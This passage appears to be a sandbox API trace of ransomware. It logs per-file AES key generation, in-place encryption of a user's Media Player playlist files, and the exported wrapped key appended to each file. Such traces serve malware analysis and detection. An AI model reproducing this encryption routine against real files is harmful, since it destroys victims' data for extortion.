lpOverlapped=0x0) returned 1 [0142.550] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.550] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.550] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.551] CloseHandle (hObject=0x1a0) returned 1 [0142.615] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.619] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.619] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.619] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.619] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.619] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl", dwFileAttributes=0x80) returned 1 [0142.620] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.620] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=797) returned 1 [0142.620] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=797) returned 1 [0142.620] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x1fb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.620] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.621] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.621] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.621] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.621] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.621] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x31d, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x31d, lpOverlapped=0x0) returned 1 [0142.621] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.621] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x31d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x320) returned 1 [0142.621] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.622] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x320, lpOverlapped=0x0) returned 1 [0142.622] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.622] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.622] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.622] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.622] CloseHandle (hObject=0x1a0) returned 1 [0142.648] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.652] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.653] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.653] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.653] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.653] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl", dwFileAttributes=0x80) returned 1 [0142.661] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.662] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=785) returned 1 [0142.662] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=785) returned 1 [0142.662] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x1ef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.662] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.663] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.663] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.663] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.663] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.663] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x311, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x311, lpOverlapped=0x0) returned 1 [0142.663] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.663] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x311, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x320) returned 1 [0142.663] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.663] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x320, lpOverlapped=0x0) returned 1 [0142.664] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.664] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.664] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.664] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.664] CloseHandle (hObject=0x1a0) returned 1 [0142.681] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.685] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.685] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.685] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.685] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.686] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl", dwFileAttributes=0x80) returned 1 [0142.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.686] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1040) returned 1 [0142.686] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1040) returned 1 [0142.686] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x2ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.686] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.687] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.688] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.688] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.688] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.688] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x410, lpOverlapped=0x0) returned 1 [0142.688] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.688] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x410, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x420) returned 1 [0142.688] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.688] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x420, lpOverlapped=0x0) returned 1 [0142.688] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.688] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.688] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.688] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.688] CloseHandle (hObject=0x1a0) returned 1 [0142.705] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.709] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.709] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.709] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.709] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.710] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl", dwFileAttributes=0x80) returned 1 [0142.710] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.710] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1020) returned 1 [0142.710] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1020) returned 1 [0142.710] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x2da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.710] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.711] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.711] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.712] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.712] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.712] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x3fc, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x3fc, lpOverlapped=0x0) returned 1 [0142.712] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.712] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x3fc, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x400) returned 1 [0142.712] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.712] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x400, lpOverlapped=0x0) returned 1 [0142.712] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.712] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.712] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.712] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.712] CloseHandle (hObject=0x1a0) returned 1 [0142.729] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.733] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.733] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.733] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.733] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.733] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl", dwFileAttributes=0x80) returned 1 [0142.735] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.735] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1025) returned 1 [0142.735] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1025) returned 1 [0142.735] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x2df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.735] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.736] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.736] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.736] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.737] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.737] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x401, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x401, lpOverlapped=0x0) returned 1 [0142.737] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.737] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x401, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x410) returned 1 [0142.737] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.737] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x410, lpOverlapped=0x0) returned 1 [0142.737] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.737] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.737] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.737] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.737] CloseHandle (hObject=0x1a0) returned 1 [0142.754] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.758] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.758] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.758] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.758] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.758] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl", dwFileAttributes=0x80) returned 1 [0142.759] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.759] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1063) returned 1 [0142.759] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1063) returned 1 [0142.759] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x305, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.760] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.761] SetFilePointer (in: hFile=0x1a0, 